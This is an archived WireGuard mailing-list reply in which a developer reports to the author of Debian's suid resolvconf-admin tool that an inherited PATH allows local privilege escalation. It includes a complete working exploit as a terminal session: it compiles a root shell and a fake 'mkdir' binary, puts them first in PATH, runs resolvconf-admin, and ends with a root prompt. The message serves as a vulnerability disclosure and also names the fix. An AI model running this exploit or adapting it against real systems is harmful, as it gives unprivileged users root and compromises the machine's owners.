From: "Jason A. Donenfeld" <Jason@zx2c4.com>
To: Daniel Kahn Gillmor <dkg@fifthhorseman.net>
Cc: WireGuard mailing list <wireguard@lists.zx2c4.com>
Subject: Re: Fixing wg-quick's DNS= directive with a hatchet
Date: Sun, 29 Oct 2017 23:06:31 +0100 [thread overview]
Message-ID: <CAHmME9rpVS84KzU4a76tKLPVQ0MfjegvQhLzrF6z=F5Um8128g@mail.gmail.com> (raw)
In-Reply-To: <87ineze3x2.fsf@fifthhorseman.net>
On Sat, Oct 28, 2017 at 4:35 PM, Daniel Kahn Gillmor
<dkg@fifthhorseman.net> wrote:
> I actually shipped the resolvconf-admin package in debian to provide
> some kind of filtering interface to avoid total garbage from the network
> getting accidentally passed through to arbitrary resolvconf plugins.
By the way, the program you wrote introduces a trivial local privilege
escalation vulnerability into Debian, since not all available
providers of the resolvconf binary set PATH themselves. Always clear
environment variables yourself before exec'ing anything in an suid
executable. Here's an exploit:
unpriv@scw-968260:~$ id
uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins)
unpriv@scw-968260:~$ stat /usr/bin/resolvconf-admin
File: /usr/bin/resolvconf-admin
Size: 24736 Blocks: 56 IO Block: 4096 regular file
Device: fd00h/64768d Inode: 2897743 Links: 1
Access: (4754/-rwsr-xr--) Uid: ( 0/ root) Gid: (
114/resolvconf-admins)
Access: 2017-10-29 21:56:25.709185001 +0000
Modify: 2017-10-29 21:55:04.529185001 +0000
Change: 2017-10-29 21:55:41.449185001 +0000
Birth: -
unpriv@scw-968260:~$ echo 'main() { setuid(0); setgid(0);
execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c
unpriv@scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0);
chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c
unpriv@scw-968260:~$ export PATH="$PWD:$PATH"
unpriv@scw-968260:~$ resolvconf-admin add eth0 8.8.8.8
Cannot write to /run/resolvconf/lock
unpriv@scw-968260:~$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)
next prev parent reply other threads:[~2017-10-29 22:04 UTC|newest]
Thread overview: 40+ messages / expand[flat|nested] mbox.gz Atom feed top
2017-10-25 22:43 Jason A. Donenfeld
2017-10-25 23:37 ` Kalin KOZHUHAROV
2017-10-26 0:55 ` Jason A. Donenfeld
2017-10-26 1:32 ` [PATCH] wg-quick: use bind mount for DNS when no openresolv Jason A. Donenfeld
2017-10-26 1:53 ` Kalin KOZHUHAROV
2017-10-26 1:54 ` Jason A. Donenfeld
2017-10-26 13:41 ` [PATCH v2] " Jason A. Donenfeld
2017-10-26 2:54 ` Fixing wg-quick's DNS= directive with a hatchet Eric Light
2017-10-26 3:21 ` Jason A. Donenfeld
2017-10-26 13:11 ` Jason A. Donenfeld
2017-10-26 16:56 ` Joe Doss
2017-10-26 17:24 ` Jason A. Donenfeld
2017-10-26 21:22 ` Jason A. Donenfeld
2017-10-27 10:07 ` Martin Hauke
2017-10-27 13:22 ` Jason A. Donenfeld
2017-10-27 14:47 ` Joe Doss
2017-10-27 14:51 ` Jason A. Donenfeld
2017-10-27 15:02 ` Jason A. Donenfeld
2017-10-27 15:38 ` Joe Doss
2017-10-27 22:04 ` Bruno Wolff III
2017-10-27 15:38 ` Joe Doss
2017-10-27 17:15 ` Jason A. Donenfeld
2017-10-27 17:52 ` Jason A. Donenfeld
2017-10-27 22:06 ` Daniel Kahn Gillmor
2017-10-28 2:24 ` Jason A. Donenfeld
2017-10-28 2:39 ` Jason A. Donenfeld
2017-10-28 14:35 ` Daniel Kahn Gillmor
2017-10-28 17:57 ` Jason A. Donenfeld
2017-10-29 12:21 ` Geo Kozey
2017-10-29 17:07 ` Jason A. Donenfeld
2017-10-30 11:58 ` Daniel Kahn Gillmor
2017-10-30 12:10 ` Daniel Kahn Gillmor
2017-10-29 22:06 ` Jason A. Donenfeld [this message]
2017-10-30 12:16 ` Daniel Kahn Gillmor
2017-10-31 10:49 ` Jason A. Donenfeld
2017-10-26 19:58 Geo Kozey
2017-10-26 21:11 ` Jason A. Donenfeld
2017-10-26 22:01 ` Geo Kozey
2017-10-26 22:19 ` Jason A. Donenfeld
2017-10-26 22:52 ` Geo Kozey
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to='CAHmME9rpVS84KzU4a76tKLPVQ0MfjegvQhLzrF6z=F5Um8128g@mail.gmail.com' \
--to=jason@zx2c4.com \
--cc=dkg@fifthhorseman.net \
--cc=wireguard@lists.zx2c4.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).